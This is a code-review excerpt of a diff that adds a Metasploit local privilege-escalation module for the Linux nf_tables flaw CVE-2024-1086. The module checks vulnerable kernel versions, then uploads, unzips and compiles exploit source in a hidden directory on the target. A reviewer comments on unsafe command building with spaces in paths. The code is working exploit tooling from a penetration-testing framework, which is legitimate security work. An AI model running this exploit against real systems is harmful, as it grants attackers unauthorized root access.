modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb

```diff
@@ -0,0 +1,177 @@
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # there is likely backporting going on per distro as well
+    release = kernel_release
+    if (
+      Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
+      Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
+    ) ||
+       (
+        Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
+        Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
+      )
+      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
+    end
+
+    CheckCode::Safe("Kernel version #{release} is not vulnerable")
+  end
+
+  def check_musl_tools?
+    lib = cmd_exec('dpkg --get-selections | grep musl-tools')
+    if lib.include?('musl-tools')
+      vprint_good('musl-tools is installed')
+      return true
+    else
+      print_error('musl-tools is not installed.  Compiling will fail.')
+    end
+    false
+  end
+
+  def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    nested_base = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    print_status("Creating #{nested_base}")
+    mkdir nested_base
+    register_dirs_for_cleanup(nested_base)
+
+    if live_compile? &&
+       check_musl_tools? &&
+       (command_exists?('unzip') || command_exists?('python3'))
+      print_status 'Creating upload zip'
+      zip = Rex::Zip::Archive.new
+      # zip the entire exploit source
+      exploit_folder = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2024-1086')
+      exploit_path = ".#{rand_text_alphanumeric(5..10)}"
+      Dir.glob("#{exploit_folder}/**/*").each do |file|
+        # avoid .md files
+        next if File.extname(file) == '.md' || !File.file?(file) || file == 'LICENSE'
+
+        file_contents = File.read(file)
+
+        file_contents.gsub!('OUT_NAME = ./exploit', "OUT_NAME = ./#{exploit_path}") if file.include? 'Makefile'
+
+        # Add each file to the archive with its relative path
+        zip.add_file(file.split('CVE-2024-1086/')[1], file_contents)
+      end
+      print_status('Finished creating exploit source zip, uploading...')
+      zip_path = "#{nested_base}/.#{rand_text_alphanumeric(5..10)}.zip"
+      write_file(zip_path, zip.pack)
+      print_status('Unzipping exploit code on remote system')
+      # if unzip
+      # cmd_exec "cd #{nested_base}; pwd; unzip exploit.zip"
+      # if python3
+      if command_exists?('python3')
+        cmd_exec "python3 -m zipfile -e #{zip_path} #{nested_base}"
+      else
+        cmd_exec "unzip #{zip_path} -d #{nested_base}"
+      end
+      print_status('Compiling')
+      cmd_exec "cd #{nested_base}; make"
```

Comment:
The `nested_base` value contains a portion that is user specified from the `WritableDir` datastore option. If that value contains a space, then these commands will fail.

We've recently added a new command execution API to handle these cases correctly and t should generally be used when the command is not static.

As an example the first one should be `create_process('python3', args: ['-m', 'zipfile', '-e', zip_path, nested_base])`.

The new `#create_process` method will take the arguments and ensure that they are escaped correctly for you given the context in which they're executed (platform, session type, etc.).